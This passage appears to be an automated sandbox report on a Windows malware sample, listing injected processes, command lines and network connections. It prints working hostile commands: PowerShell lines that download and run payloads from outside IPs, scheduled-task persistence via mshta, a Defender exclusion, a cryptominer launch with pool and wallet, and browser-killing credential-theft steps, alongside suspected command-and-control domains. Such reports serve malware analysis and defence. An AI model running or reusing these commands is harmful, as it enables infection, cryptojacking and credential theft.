PID 4284 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4284 wrote to memory of 2500 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4684 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 4684 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 4684 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2232 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2232 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 3116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3828 wrote to memory of 3116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3828 wrote to memory of 3116 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2408 wrote to memory of 1944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3828 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4112 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4112 wrote to memory of 2348 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1944 wrote to memory of 4260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1944 wrote to memory of 4260 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2500 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE
PID 2500 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE
PID 2500 wrote to memory of 5096 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE
PID 4260 wrote to memory of 1052 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4260 wrote to memory of 1052 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1944 wrote to memory of 3480 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3828 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3828 wrote to memory of 1028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1028 wrote to memory of 1896 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe

"C:\Users\Admin\AppData\Local\Temp\bfb0cca86bffab173098282c98d73f0f5e9f656c1a941eaf2825eaed2fe0bd7e.exe"

C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe

"C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E34B.tmp\E34C.tmp\E34D.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn aiw93ma5VhJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\tGOAsdxdd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\tGOAsdxdd.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn aiw93ma5VhJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\tGOAsdxdd.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\14dhhefq\14dhhefq.cmdline"

C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE

"C:\Users\Admin\AppData\Local\TempVHE2I6JMLERZCIOUT5YVI1DKCRTS7EJV.EXE"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES25D3.tmp" "c:\Users\Admin\AppData\Local\Temp\14dhhefq\CSC16BBA28762344C99B0BD8DC1F95B47F.TMP"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "jufCWmaq60l" /tr "mshta \"C:\Temp\1zsFbOQ8w.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\1zsFbOQ8w.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe

"C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe"

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\qD7QoBvD\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe"

C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe"

C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe

"C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1036 -ip 1036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 808

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe

"C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe

"C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe

"C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe"

C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe

"C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\ProgramData\nrwu\epug.exe

C:\ProgramData\nrwu\epug.exe

C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe

"C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe

"C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1872 -prefsLen 27209 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7b00a46-2ac8-46fe-8d7a-d47405626773} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" gpu

C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\15EF.tmp\15F0.tmp\15F1.bat C:\Users\Admin\AppData\Local\Temp\10109000101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2420 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 28129 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97896a8e-460a-4738-9135-137afff7abb0} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2952 -childID 1 -isForBrowser -prefsHandle 3044 -prefMapHandle 2720 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {57198f2d-5dc9-4398-b8c4-19eb40c06aa4} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4080 -childID 2 -isForBrowser -prefsHandle 4076 -prefMapHandle 4052 -prefsLen 32619 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e213fe1-b986-490d-b935-6ea5687e2e43} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4932 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 32619 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf19455d-8b82-4f05-835b-8d0b755a157f} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2580 -childID 3 -isForBrowser -prefsHandle 5376 -prefMapHandle 5308 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95e2556e-4c17-49ef-a6fd-4a9e95f1a1ef} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5496 -childID 4 -isForBrowser -prefsHandle 5500 -prefMapHandle 5504 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f891ba27-eed9-4111-90d6-48ef698a3192} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5680 -childID 5 -isForBrowser -prefsHandle 5688 -prefMapHandle 5692 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3b365fa-3a51-40dd-9b0b-802f3b498b83} 1380 "\\.\pipe\gecko-crash-server-pipe.1380" tab

C:\Users\Admin\AppData\Local\Temp\10109010101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10109010101\v6Oqdnc.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5496 -ip 5496

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5496 -s 828

C:\Users\Admin\AppData\Local\Temp\E6Y1544WWSCW8CYF8.exe

"C:\Users\Admin\AppData\Local\Temp\E6Y1544WWSCW8CYF8.exe"

C:\Users\Admin\AppData\Local\Temp\10109030101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109030101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3036 -ip 3036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 796

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\qD7QoBvD\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10109060101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109060101\Ps7WqSx.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 104.21.32.1:443 exarthynature.run tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 192.248.189.11:443 pool.hashvault.pro tcp
US 104.21.32.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
CH 185.208.156.162:80 185.208.156.162 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.112.1:443 croprojegies.run tcp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 172.67.212.102:443 codxefusion.top tcp
N/A 127.0.0.1:55530 tcp
NL 45.144.212.77:16000 45.144.212.77 tcp
US 104.21.112.1:443 croprojegies.run tcp
US 104.21.112.1:443 croprojegies.run tcp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
GB 172.217.169.46:443 www.youtube.com tcp
GB 172.217.169.46:443 www.youtube.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 172.67.212.102:443 codxefusion.top tcp
US 104.21.112.1:443 croprojegies.run tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
RU 176.113.115.7:80 176.113.115.7 tcp
US 104.21.112.1:443 croprojegies.run tcp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 172.67.212.102:443 codxefusion.top tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 104.21.112.1:443 croprojegies.run tcp
US 8.8.8.8:53 www.dropbox.com udp
GB 162.125.64.18:443 www.dropbox.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 104.21.9.123:443 moderzysics.top tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 104.21.9.123:443 moderzysics.top tcp
US 172.67.192.128:443 biochextryhub.bet tcp
